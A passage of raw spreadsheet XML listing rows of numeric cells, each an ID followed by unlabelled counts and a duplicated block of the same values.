        <v>1</v>
      </c>
      <c r="D1529" s="8">
        <v>1</v>
      </c>
      <c r="E1529" s="8">
        <v>1</v>
      </c>
      <c r="F1529" s="8">
        <v>3</v>
      </c>
      <c r="G1529" s="8">
        <v>2</v>
      </c>
      <c r="H1529" s="8">
        <v>38</v>
      </c>
      <c r="K1529" s="7">
        <v>5711</v>
      </c>
      <c r="L1529" s="8">
        <v>30</v>
      </c>
      <c r="M1529" s="8">
        <v>1</v>
      </c>
      <c r="N1529" s="8">
        <v>1</v>
      </c>
      <c r="O1529" s="8">
        <v>1</v>
      </c>
      <c r="P1529" s="8">
        <v>3</v>
      </c>
      <c r="Q1529" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1530" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1530" s="7">
        <v>5713</v>
      </c>
      <c r="B1530" s="8">
        <v>24</v>
      </c>
      <c r="C1530" s="8">
        <v>1</v>
      </c>
      <c r="D1530" s="8">
        <v>0</v>
      </c>
      <c r="E1530" s="8">
        <v>0</v>
      </c>
      <c r="F1530" s="8">
        <v>2</v>
      </c>
      <c r="G1530" s="8">
        <v>1</v>
      </c>
      <c r="H1530" s="8">
        <v>28</v>
      </c>
      <c r="K1530" s="7">
        <v>5713</v>
      </c>
      <c r="L1530" s="8">
        <v>24</v>
      </c>
      <c r="M1530" s="8">
        <v>1</v>
      </c>
      <c r="N1530" s="8">
        <v>0</v>
      </c>
      <c r="O1530" s="8">
        <v>0</v>
      </c>
      <c r="P1530" s="8">
        <v>2</v>
      </c>
      <c r="Q1530" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1531" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1531" s="7">
        <v>5714</v>
      </c>
      <c r="B1531" s="8">
        <v>30</v>
      </c>
      <c r="C1531" s="8">
        <v>0</v>
      </c>
      <c r="D1531" s="8">
        <v>2</v>
      </c>
      <c r="E1531" s="8">
        <v>0</v>
      </c>
      <c r="F1531" s="8">
        <v>1</v>
      </c>
      <c r="G1531" s="8">
        <v>1</v>
      </c>
      <c r="H1531" s="8">
        <v>34</v>
      </c>
      <c r="K1531" s="7">
        <v>5714</v>
      </c>
      <c r="L1531" s="8">
        <v>30</v>
      </c>
      <c r="M1531" s="8">
        <v>0</v>
      </c>
      <c r="N1531" s="8">
        <v>2</v>
      </c>
      <c r="O1531" s="8">
        <v>0</v>
      </c>
      <c r="P1531" s="8">
        <v>1</v>
      </c>
      <c r="Q1531" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1532" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1532" s="7">
        <v>5715</v>
      </c>
      <c r="B1532" s="8">
        <v>30</v>
      </c>
      <c r="C1532" s="8">
        <v>1</v>
      </c>
      <c r="D1532" s="8">
        <v>0</v>
      </c>
      <c r="E1532" s="8">
        <v>0</v>
      </c>
      <c r="F1532" s="8">
        <v>4</v>
      </c>
      <c r="G1532" s="8">
        <v>0</v>
      </c>
      <c r="H1532" s="8">
        <v>35</v>
      </c>
      <c r="K1532" s="7">
        <v>5715</v>
      </c>
      <c r="L1532" s="8">
        <v>30</v>
      </c>
      <c r="M1532" s="8">
        <v>1</v>
      </c>
      <c r="N1532" s="8">
        <v>0</v>
      </c>
      <c r="O1532" s="8">
        <v>0</v>
      </c>
      <c r="P1532" s="8">
        <v>4</v>
      </c>
      <c r="Q1532" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1533" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1533" s="7">
        <v>5719</v>
      </c>
      <c r="B1533" s="8">
        <v>20</v>
      </c>
      <c r="C1533" s="8">
        <v>1</v>
      </c>
      <c r="D1533" s="8">
        <v>5</v>
      </c>
      <c r="E1533" s="8">
        <v>15</v>
      </c>
      <c r="F1533" s="8">
        <v>15</v>
      </c>
      <c r="G1533" s="8">
        <v>25</v>
      </c>
      <c r="H1533" s="8">
        <v>81</v>
      </c>
      <c r="K1533" s="7">
        <v>5719</v>
      </c>
      <c r="L1533" s="8">
        <v>20</v>
      </c>
      <c r="M1533" s="8">
        <v>1</v>
      </c>
      <c r="N1533" s="8">
        <v>5</v>
      </c>
      <c r="O1533" s="8">
        <v>15</v>
      </c>
      <c r="P1533" s="8">
        <v>15</v>
      </c>
      <c r="Q1533" s="8">
        <v>25</v>
      </c>
    </row>
    <row r="1534" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1534" s="7">
        <v>5722</v>
      </c>
      <c r="B1534" s="8">
        <v>25</v>
      </c>
      <c r="C1534" s="8">
        <v>1</v>
      </c>
      <c r="D1534" s="8">
        <v>24</v>
      </c>
      <c r="E1534" s="8">
        <v>23</v>
      </c>
      <c r="F1534" s="8">
        <v>3</v>
      </c>
      <c r="G1534" s="8">
        <v>0</v>
      </c>
      <c r="H1534" s="8">
        <v>76</v>
      </c>
      <c r="K1534" s="7">
        <v>5722</v>
      </c>
      <c r="L1534" s="8">
        <v>25</v>
      </c>
      <c r="M1534" s="8">
        <v>1</v>
      </c>
      <c r="N1534" s="8">
        <v>24</v>
      </c>
      <c r="O1534" s="8">
        <v>23</v>
      </c>
      <c r="P1534" s="8">
        <v>3</v>
      </c>
      <c r="Q1534" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1535" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1535" s="7">
        <v>5723</v>
      </c>
      <c r="B1535" s="8">
        <v>26</v>
      </c>
      <c r="C1535" s="8">
        <v>1</v>
      </c>
      <c r="D1535" s="8">
        <v>4</v>
      </c>
      <c r="E1535" s="8">
        <v>2</v>
      </c>
      <c r="F1535" s="8">
        <v>2</v>
      </c>
      <c r="G1535" s="8">
        <v>3</v>
      </c>
      <c r="H1535" s="8">
        <v>38</v>
      </c>
      <c r="K1535" s="7">
        <v>5723</v>
      </c>
      <c r="L1535" s="8">
        <v>26</v>
      </c>
      <c r="M1535" s="8">
        <v>1</v>
      </c>
      <c r="N1535" s="8">
        <v>4</v>
      </c>
      <c r="O1535" s="8">
        <v>2</v>
      </c>
      <c r="P1535" s="8">
        <v>2</v>
      </c>
      <c r="Q1535" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1536" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1536" s="7">
        <v>5727</v>
      </c>
      <c r="B1536" s="8">
        <v>24</v>
      </c>
      <c r="C1536" s="8">
        <v>1</v>
      </c>
      <c r="D1536" s="8">
        <v>17</v>
      </c>
      <c r="E1536" s="8">
        <v>25</v>
      </c>
      <c r="F1536" s="8">
        <v>6</v>
      </c>
      <c r="G1536" s="8">
        <v>5</v>
      </c>
      <c r="H1536" s="8">
        <v>78</v>
      </c>
      <c r="K1536" s="7">
        <v>5727</v>
      </c>
      <c r="L1536" s="8">
        <v>24</v>
      </c>
      <c r="M1536" s="8">
        <v>1</v>
      </c>
      <c r="N1536" s="8">
        <v>17</v>
      </c>
      <c r="O1536" s="8">
        <v>25</v>
      </c>
      <c r="P1536" s="8">
        <v>6</v>
      </c>
      <c r="Q1536" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1537" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1537" s="7">
        <v>5733</v>
      </c>
      <c r="B1537" s="8">
        <v>25</v>
      </c>
      <c r="C1537" s="8">
        <v>2</v>
      </c>
      <c r="D1537" s="8">
        <v>6</v>
      </c>
      <c r="E1537" s="8">
        <v>8</v>
      </c>
      <c r="F1537" s="8">
        <v>1</v>
      </c>
      <c r="G1537" s="8">
        <v>1</v>
      </c>
      <c r="H1537" s="8">
        <v>43</v>
      </c>
      <c r="K1537" s="7">
        <v>5733</v>
      </c>
      <c r="L1537" s="8">
        <v>25</v>
      </c>
      <c r="M1537" s="8">
        <v>2</v>
      </c>
      <c r="N1537" s="8">
        <v>6</v>
      </c>
      <c r="O1537" s="8">
        <v>8</v>
      </c>
      <c r="P1537" s="8">
        <v>1</v>
      </c>
      <c r="Q1537" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1538" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1538" s="7">
        <v>5734</v>
      </c>
      <c r="B1538" s="8">
        <v>25</v>
      </c>
      <c r="C1538" s="8">
        <v>0</v>
      </c>
      <c r="D1538" s="8">
        <v>2</v>
      </c>
      <c r="E1538" s="8">
        <v>0</v>
      </c>
      <c r="F1538" s="8">
        <v>4</v>
      </c>
      <c r="G1538" s="8">
        <v>2</v>
      </c>
      <c r="H1538" s="8">
        <v>33</v>
      </c>
      <c r="K1538" s="7">
        <v>5734</v>
      </c>
      <c r="L1538" s="8">
        <v>25</v>
      </c>
      <c r="M1538" s="8">
        <v>0</v>
      </c>
      <c r="N1538" s="8">
        <v>2</v>
      </c>
      <c r="O1538" s="8">
        <v>0</v>
      </c>
      <c r="P1538" s="8">
        <v>4</v>
      </c>
      <c r="Q1538" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1539" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1539" s="7">
        <v>5735</v>
      </c>
      <c r="B1539" s="8">
        <v>26</v>
      </c>
      <c r="C1539" s="8">
        <v>1</v>
      </c>
      <c r="D1539" s="8">
        <v>0</v>
      </c>
      <c r="E1539" s="8">
        <v>0</v>
      </c>
      <c r="F1539" s="8">
        <v>45</v>
      </c>
      <c r="G1539" s="8">
        <v>285</v>
      </c>
      <c r="H1539" s="8">
        <v>357</v>
      </c>
      <c r="K1539" s="7">
        <v>5735</v>
      </c>
      <c r="L1539" s="8">
        <v>26</v>
      </c>
      <c r="M1539" s="8">
        <v>1</v>
      </c>
      <c r="N1539" s="8">
        <v>0</v>
      </c>
      <c r="O1539" s="8">
        <v>0</v>
      </c>
      <c r="P1539" s="8">
        <v>45</v>
      </c>
      <c r="Q1539" s="8">
        <v>285</v>
      </c>
    </row>
    <row r="1540" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1540" s="7">
        <v>5745</v>
      </c>
      <c r="B1540" s="8">
        <v>0</v>
      </c>
      <c r="C1540" s="8">
        <v>0</v>
      </c>
      <c r="D1540" s="8">
        <v>0</v>
      </c>
      <c r="E1540" s="8">
        <v>0</v>
      </c>
      <c r="F1540" s="8">
        <v>2</v>
      </c>
      <c r="G1540" s="8">
        <v>3</v>
      </c>
      <c r="H1540" s="8">
        <v>5</v>
      </c>
      <c r="K1540" s="7">
        <v>5745</v>
      </c>
      <c r="L1540" s="8">
        <v>0</v>
      </c>
      <c r="M1540" s="8">
        <v>0</v>
      </c>
      <c r="N1540" s="8">
        <v>0</v>
      </c>
      <c r="O1540" s="8">
        <v>0</v>
      </c>
      <c r="P1540" s="8">
        <v>2</v>
      </c>
      <c r="Q1540" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1541" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1541" s="7">
        <v>5746</v>
      </c>
      <c r="B1541" s="8">
        <v>0</v>
      </c>
      <c r="C1541" s="8">
        <v>0</v>
      </c>
      <c r="D1541" s="8">
        <v>0</v>
      </c>
      <c r="E1541" s="8">
        <v>0</v>
      </c>
      <c r="F1541" s="8">
        <v>1</v>
      </c>
      <c r="G1541" s="8">
        <v>5</v>
      </c>
      <c r="H1541" s="8">
        <v>6</v>
      </c>
      <c r="K1541" s="7">
        <v>5746</v>
      </c>
      <c r="L1541" s="8">
        <v>0</v>
      </c>
      <c r="M1541" s="8">
        <v>0</v>
      </c>
      <c r="N1541" s="8">
        <v>0</v>
      </c>
      <c r="O1541" s="8">
        <v>0</v>
      </c>
      <c r="P1541" s="8">
        <v>1</v>
      </c>
      <c r="Q1541" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1542" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1542" s="7">
        <v>5747</v>
      </c>
      <c r="B1542" s="8">
        <v>26</v>
      </c>
      <c r="C1542" s="8">
        <v>0</v>
      </c>
      <c r="D1542" s="8">
        <v>5</v>
      </c>
      <c r="E1542" s="8">
        <v>0</v>
      </c>
      <c r="F1542" s="8">
        <v>15</v>
      </c>
      <c r="G1542" s="8">
        <v>0</v>
      </c>
      <c r="H1542" s="8">
        <v>46</v>
      </c>
      <c r="K1542" s="7">
        <v>5747</v>
      </c>
      <c r="L1542" s="8">
        <v>26</v>
      </c>
      <c r="M1542" s="8">
        <v>0</v>
      </c>
      <c r="N1542" s="8">
        <v>5</v>
      </c>
      <c r="O1542" s="8">
        <v>0</v>
      </c>
      <c r="P1542" s="8">
        <v>15</v>
      </c>
      <c r="Q1542" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1543" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1543" s="7">
        <v>5748</v>
      </c>
      <c r="B1543" s="8">
        <v>25</v>
      </c>
      <c r="C1543" s="8">
        <v>1</v>
      </c>
      <c r="D1543" s="8">
        <v>0</v>
      </c>
      <c r="E1543" s="8">
        <v>0</v>
      </c>
      <c r="F1543" s="8">
        <v>5</v>
      </c>
      <c r="G1543" s="8">
        <v>12</v>
      </c>
      <c r="H1543" s="8">
        <v>43</v>
      </c>
      <c r="K1543" s="7">
        <v>5748</v>
      </c>
      <c r="L1543" s="8">
        <v>25</v>
      </c>
      <c r="M1543" s="8">
        <v>1</v>
      </c>
      <c r="N1543" s="8">
        <v>0</v>
      </c>
      <c r="O1543" s="8">
        <v>0</v>
      </c>
      <c r="P1543" s="8">
        <v>5</v>
      </c>
      <c r="Q1543" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="1544" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1544" s="7">
        <v>5751</v>
      </c>
      <c r="B1544" s="8">
        <v>10</v>
      </c>
      <c r="C1544" s="8">
        <v>1</v>
      </c>
      <c r="D1544" s="8">
        <v>0</v>
      </c>
      <c r="E1544" s="8">
        <v>0</v>
      </c>
      <c r="F1544" s="8">
        <v>1</v>
      </c>
      <c r="G1544" s="8">
        <v>2</v>
      </c>
      <c r="H1544" s="8">
        <v>14</v>
      </c>
      <c r="K1544" s="7">
        <v>5751</v>
      </c>
      <c r="L1544" s="8">
        <v>10</v>
      </c>
      <c r="M1544" s="8">
        <v>1</v>
      </c>
      <c r="N1544" s="8">
        <v>0</v>
      </c>
      <c r="O1544" s="8">
        <v>0</v>
      </c>
      <c r="P1544" s="8">
        <v>1</v>
      </c>
      <c r="Q1544" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1545" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1545" s="7">
        <v>5752</v>
      </c>
      <c r="B1545" s="8">
        <v>24</v>
      </c>
      <c r="C1545" s="8">
        <v>1</v>
      </c>
      <c r="D1545" s="8">
        <v>1</v>
      </c>
      <c r="E1545" s="8">
        <v>2</v>
      </c>
      <c r="F1545" s="8">
        <v>0</v>
      </c>
      <c r="G1545" s="8">
        <v>0</v>
      </c>
      <c r="H1545" s="8">
        <v>28</v>
      </c>
      <c r="K1545" s="7">
        <v>5752</v>
      </c>
      <c r="L1545" s="8">
        <v>24</v>
      </c>
      <c r="M1545" s="8">
        <v>1</v>
      </c>
      <c r="N1545" s="8">
        <v>1</v>
      </c>
      <c r="O1545" s="8">
        <v>2</v>
      </c>
      <c r="P1545" s="8">
        <v>0</v>
      </c>
      <c r="Q1545" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1546" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1546" s="7">
        <v>5754</v>
      </c>
      <c r="B1546" s="8">
        <v>30</v>
      </c>
      <c r="C1546" s="8">
        <v>1</v>
      </c>
      <c r="D1546" s="8">
        <v>2</v>
      </c>
      <c r="E1546" s="8">
        <v>0</v>
      </c>
      <c r="F1546" s="8">
        <v>3</v>
      </c>
      <c r="G1546" s="8">
        <v>1</v>
      </c>
      <c r="H1546" s="8">
        <v>37</v>
      </c>
      <c r="K1546" s="7">
        <v>5754</v>
      </c>
      <c r="L1546" s="8">
        <v>30</v>
      </c>
      <c r="M1546" s="8">
        <v>1</v>
      </c>
      <c r="N1546" s="8">
        <v>2</v>
      </c>
      <c r="O1546" s="8">
        <v>0</v>
      </c>
      <c r="P1546" s="8">
        <v>3</v>
      </c>
      <c r="Q1546" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1547" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1547" s="7">
        <v>5755</v>
      </c>
      <c r="B1547" s="8">
        <v>22</v>
      </c>
      <c r="C1547" s="8">
        <v>1</v>
      </c>
      <c r="D1547" s="8">
        <v>9</v>
      </c>
      <c r="E1547" s="8">
        <v>2</v>
      </c>
      <c r="F1547" s="8">
        <v>4</v>
      </c>
      <c r="G1547" s="8">
        <v>1</v>
      </c>
      <c r="H1547" s="8">
        <v>39</v>
      </c>
      <c r="K1547" s="7">
        <v>5755</v>
      </c>
      <c r="L1547" s="8">
        <v>22</v>
      </c>
      <c r="M1547" s="8">
        <v>1</v>
      </c>
      <c r="N1547" s="8">
        <v>9</v>
      </c>
      <c r="O1547" s="8">
        <v>2</v>
      </c>
      <c r="P1547" s="8">
        <v>4</v>
      </c>
      <c r="Q1547" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1548" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1548" s="7">
        <v>5759</v>
      </c>
      <c r="B1548" s="8">
        <v>20</v>
      </c>
      <c r="C1548" s="8">
        <v>1</v>
      </c>
      <c r="D1548" s="8">
        <v>0</v>
      </c>
      <c r="E1548" s="8">
        <v>1</v>
      </c>
      <c r="F1548" s="8">
        <v>0</v>
      </c>
      <c r="G1548" s="8">
        <v>3</v>
      </c>
      <c r="H1548" s="8">
        <v>25</v>
      </c>
      <c r="K1548" s="7">
        <v>5759</v>
      </c>
      <c r="L1548" s="8">
        <v>20</v>
      </c>
      <c r="M1548" s="8">
        <v>1</v>
      </c>
      <c r="N1548" s="8">
        <v>0</v>
      </c>
      <c r="O1548" s="8">
        <v>1</v>
      </c>
      <c r="P1548" s="8">
        <v>0</v>
      </c>
      <c r="Q1548" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1549" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1549" s="7">
        <v>5761</v>
      </c>
      <c r="B1549" s="8">
        <v>0</v>
      </c>
      <c r="C1549" s="8">
        <v>0</v>
      </c>
      <c r="D1549" s="8">
        <v>0</v>
      </c>
      <c r="E1549" s="8">
        <v>0</v>
      </c>
      <c r="F1549" s="8">
        <v>3</v>
      </c>
      <c r="G1549" s="8">
        <v>0</v>
      </c>
      <c r="H1549" s="8">
        <v>3</v>
      </c>
      <c r="K1549" s="7">
        <v>5761</v>
      </c>
      <c r="L1549" s="8">
        <v>0</v>
      </c>
      <c r="M1549" s="8">
        <v>0</v>
      </c>
      <c r="N1549" s="8">
        <v>0</v>
      </c>
      <c r="O1549" s="8">
        <v>0</v>
      </c>
      <c r="P1549" s="8">
        <v>3</v>
      </c>
      <c r="Q1549" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1550" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1550" s="7">
        <v>5762</v>
      </c>
      <c r="B1550" s="8">
        <v>0</v>
      </c>
      <c r="C1550" s="8">
        <v>0</v>
      </c>
      <c r="D1550" s="8">
        <v>0</v>
      </c>
      <c r="E1550" s="8">
        <v>0</v>
      </c>
      <c r="F1550" s="8">
        <v>1</v>
      </c>
      <c r="G1550" s="8">
        <v>2</v>
      </c>
      <c r="H1550" s="8">
        <v>3</v>
      </c>
      <c r="K1550" s="7">
        <v>5762</v>
      </c>
      <c r="L1550" s="8">
        <v>0</v>
      </c>
      <c r="M1550" s="8">
        <v>0</v>
      </c>
      <c r="N1550" s="8">
        <v>0</v>
      </c>
      <c r="O1550" s="8">
        <v>0</v>
      </c>
      <c r="P1550" s="8">
        <v>1</v>
      </c>
      <c r="Q1550" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1551" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1551" s="7">
        <v>5764</v>
      </c>
      <c r="B1551" s="8">
        <v>24</v>
      </c>
      <c r="C1551" s="8">
        <v>1</v>
      </c>
      <c r="D1551" s="8">
        <v>1</v>
      </c>
      <c r="E1551" s="8">
        <v>0</v>
      </c>
      <c r="F1551" s="8">
        <v>2</v>
      </c>
      <c r="G1551" s="8">
        <v>1</v>
      </c>
      <c r="H1551" s="8">
        <v>29</v>
      </c>
      <c r="K1551" s="7">
        <v>5764</v>
      </c>
      <c r="L1551" s="8">
        <v>24</v>
      </c>
      <c r="M1551" s="8">
        <v>1</v>
      </c>
      <c r="N1551" s="8">
        <v>1</v>
      </c>
      <c r="O1551" s="8">
        <v>0</v>
      </c>
      <c r="P1551" s="8">
        <v>2</v>
      </c>
      <c r="Q1551" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1552" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1552" s="7">
        <v>5765</v>
      </c>
      <c r="B1552" s="8">
        <v>26</v>
      </c>
      <c r="C1552" s="8">
        <v>0</v>
      </c>
      <c r="D1552" s="8">
        <v>0</v>
      </c>
      <c r="E1552" s="8">
        <v>0</v>
      </c>
      <c r="F1552" s="8">
        <v>46</v>
      </c>
      <c r="G1552" s="8">
        <v>47</v>
      </c>
      <c r="H1552" s="8">
        <v>119</v>
      </c>
      <c r="K1552" s="7">
        <v>5765</v>
      </c>
      <c r="L1552" s="8">
        <v>26</v>
      </c>
      <c r="M1552" s="8">
        <v>0</v>
      </c>
      <c r="N1552" s="8">
        <v>0</v>
      </c>
      <c r="O1552" s="8">
        <v>0</v>
      </c>
      <c r="P1552" s="8">
        <v>46</v>
      </c>
      <c r="Q1552" s="8">
        <v>47</v>
      </c>
    </row>
    <row r="1553" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1553" s="7">
        <v>5766</v>
      </c>
      <c r="B1553" s="8">
        <v>24</v>
      </c>
      <c r="C1553" s="8">
        <v>0</v>
      </c>
      <c r="D1553" s="8">
        <v>0</v>
      </c>
      <c r="E1553" s="8">
        <v>0</v>
      </c>
      <c r="F1553" s="8">
        <v>17</v>
      </c>
      <c r="G1553" s="8">
        <v>6</v>
      </c>
      <c r="H1553" s="8">
        <v>47</v>
      </c>
      <c r="K1553" s="7">
        <v>5766</v>
      </c>
      <c r="L1553" s="8">
        <v>24</v>
      </c>
      <c r="M1553" s="8">
        <v>0</v>
      </c>
      <c r="N1553" s="8">
        <v>0</v>
      </c>
      <c r="O1553" s="8">
        <v>0</v>
      </c>
      <c r="P1553" s="8">
        <v>17</v>
      </c>
      <c r="Q1553" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1554" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1554" s="7">
        <v>5767</v>
      </c>
      <c r="B1554" s="8">
        <v>25</v>
      </c>
      <c r="C1554" s="8">
        <v>1</v>
      </c>
      <c r="D1554" s="8">
        <v>2</v>
      </c>
      <c r="E1554" s="8">
        <v>0</v>
      </c>
      <c r="F1554" s="8">
        <v>9</v>
      </c>
      <c r="G1554" s="8">
        <v>0</v>
      </c>
      <c r="H1554" s="8">
        <v>37</v>
      </c>
      <c r="K1554" s="7">
        <v>5767</v>
      </c>
      <c r="L1554" s="8">
        <v>25</v>
      </c>
      <c r="M1554" s="8">
        <v>1</v>
      </c>
      <c r="N1554" s="8">
        <v>2</v>
      </c>
      <c r="O1554" s="8">
        <v>0</v>
      </c>
      <c r="P1554" s="8">
        <v>9</v>
      </c>
      <c r="Q1554" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1555" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1555" s="7">
        <v>5768</v>
      </c>
      <c r="B1555" s="8">
        <v>0</v>
      </c>
      <c r="C1555" s="8">
        <v>0</v>
      </c>
      <c r="D1555" s="8">
        <v>3</v>
      </c>
      <c r="E1555" s="8">
        <v>0</v>
      </c>
      <c r="F1555" s="8">
        <v>13</v>
      </c>
      <c r="G1555" s="8">
        <v>2</v>
      </c>
      <c r="H1555" s="8">
        <v>18</v>
      </c>
      <c r="K1555" s="7">
        <v>5768</v>
      </c>
      <c r="L1555" s="8">
        <v>0</v>
      </c>
      <c r="M1555" s="8">
        <v>0</v>
      </c>
      <c r="N1555" s="8">
        <v>3</v>
      </c>
      <c r="O1555" s="8">
        <v>0</v>
      </c>
      <c r="P1555" s="8">
        <v>13</v>
      </c>
      <c r="Q1555" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1556" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1556" s="7">
        <v>5769</v>
      </c>
      <c r="B1556" s="8">
        <v>0</v>
      </c>
      <c r="C1556" s="8">
        <v>0</v>
      </c>
      <c r="D1556" s="8">
        <v>10</v>
      </c>
      <c r="E1556" s="8">
        <v>1</v>
      </c>
      <c r="F1556" s="8">
        <v>4</v>
      </c>
      <c r="G1556" s="8">
        <v>1</v>
      </c>
      <c r="H1556" s="8">
        <v>16</v>
      </c>
      <c r="K1556" s="7">
        <v>5769</v>
      </c>
      <c r="L1556" s="8">
        <v>0</v>
      </c>
      <c r="M1556" s="8">
        <v>0</v>
      </c>
      <c r="N1556" s="8">
        <v>10</v>
      </c>
      <c r="O1556" s="8">
        <v>1</v>
      </c>
      <c r="P1556" s="8">
        <v>4</v>
      </c>
      <c r="Q1556" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1557" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1557" s="7">
        <v>5772</v>
      </c>
      <c r="B1557" s="8">
        <v>0</v>
      </c>
      <c r="C1557" s="8">
        <v>0</v>
      </c>
      <c r="D1557" s="8">
        <v>3</v>
      </c>
      <c r="E1557" s="8">
        <v>0</v>
      </c>
      <c r="F1557" s="8">
        <v>13</v>
      </c>
      <c r="G1557" s="8">
        <v>1</v>
      </c>
      <c r="H1557" s="8">
        <v>17</v>
      </c>
      <c r="K1557" s="7">
        <v>5772</v>
      </c>
      <c r="L1557" s="8">
        <v>0</v>
      </c>
      <c r="M1557" s="8">
        <v>0</v>
      </c>
      <c r="N1557" s="8">
        <v>3</v>
      </c>
      <c r="O1557" s="8">
        <v>0</v>
      </c>
      <c r="P1557" s="8">
        <v>13</v>
      </c>
      <c r="Q1557" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1558" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1558" s="7">
        <v>5774</v>
      </c>
      <c r="B1558" s="8">
        <v>72</v>
      </c>
      <c r="C1558" s="8">
        <v>2</v>
      </c>
      <c r="D1558" s="8">
        <v>13</v>
      </c>
      <c r="E1558" s="8">
        <v>3</v>
      </c>
      <c r="F1558" s="8">
        <v>4</v>
      </c>
      <c r="G1558" s="8">
        <v>3</v>
      </c>
      <c r="H1558" s="8">
        <v>97</v>
      </c>
      <c r="K1558" s="7">
        <v>5774</v>
      </c>
      <c r="L1558" s="8">
        <v>72</v>
      </c>
      <c r="M1558" s="8">
        <v>2</v>
      </c>
      <c r="N1558" s="8">
        <v>13</v>
      </c>
      <c r="O1558" s="8">
        <v>3</v>
      </c>
      <c r="P1558" s="8">
        <v>4</v>
      </c>
      <c r="Q1558" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1559" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1559" s="7">
        <v>5775</v>
      </c>
      <c r="B1559" s="8">
        <v>12</v>
      </c>
      <c r="C1559" s="8">
        <v>1</v>
      </c>
      <c r="D1559" s="8">
        <v>1</v>
      </c>
      <c r="E1559" s="8">
        <v>3</v>
      </c>
      <c r="F1559" s="8">
        <v>0</v>
      </c>
      <c r="G1559" s="8">
        <v>0</v>
      </c>
      <c r="H1559" s="8">
        <v>17</v>
      </c>
      <c r="K1559" s="7">
        <v>5775</v>
      </c>
      <c r="L1559" s="8">
        <v>12</v>
      </c>
      <c r="M1559" s="8">
        <v>1</v>
      </c>
      <c r="N1559" s="8">
        <v>1</v>
      </c>
      <c r="O1559" s="8">
        <v>3</v>
      </c>
      <c r="P1559" s="8">
        <v>0</v>
      </c>
      <c r="Q1559" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1560" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1560" s="7">
        <v>5776</v>
      </c>
      <c r="B1560" s="8">
        <v>12</v>
      </c>
      <c r="C1560" s="8">
        <v>1</v>
      </c>
      <c r="D1560" s="8">
        <v>0</v>
      </c>
      <c r="E1560" s="8">
        <v>2</v>
      </c>
      <c r="F1560" s="8">
        <v>0</v>
      </c>
      <c r="G1560" s="8">
        <v>0</v>
      </c>
      <c r="H1560" s="8">
        <v>15</v>
      </c>
      <c r="K1560" s="7">
        <v>5776</v>
      </c>
      <c r="L1560" s="8">
        <v>12</v>
      </c>
      <c r="M1560" s="8">
        <v>1</v>
      </c>
      <c r="N1560" s="8">
        <v>0</v>
      </c>
      <c r="O1560" s="8">
        <v>2</v>
      </c>
      <c r="P1560" s="8">
        <v>0</v>
      </c>
      <c r="Q1560" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1561" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1561" s="7">
        <v>5784</v>
      </c>
      <c r="B1561" s="8">
        <v>0</v>
      </c>
      <c r="C1561" s="8">
        <v>0</v>
      </c>
      <c r="D1561" s="8">
        <v>2</v>
      </c>
      <c r="E1561" s="8">
        <v>4</v>
      </c>
      <c r="F1561" s="8">
        <v>2</v>
      </c>
      <c r="G1561" s="8">
        <v>5</v>
      </c>
      <c r="H1561" s="8">
        <v>13</v>
      </c>
      <c r="K1561" s="7">
        <v>5784</v>
      </c>
      <c r="L1561" s="8">
        <v>0</v>
      </c>
      <c r="M1561" s="8">
        <v>0</v>
      </c>
      <c r="N1561" s="8">
        <v>2</v>
      </c>
      <c r="O1561" s="8">
        <v>4</v>
      </c>
      <c r="P1561" s="8">
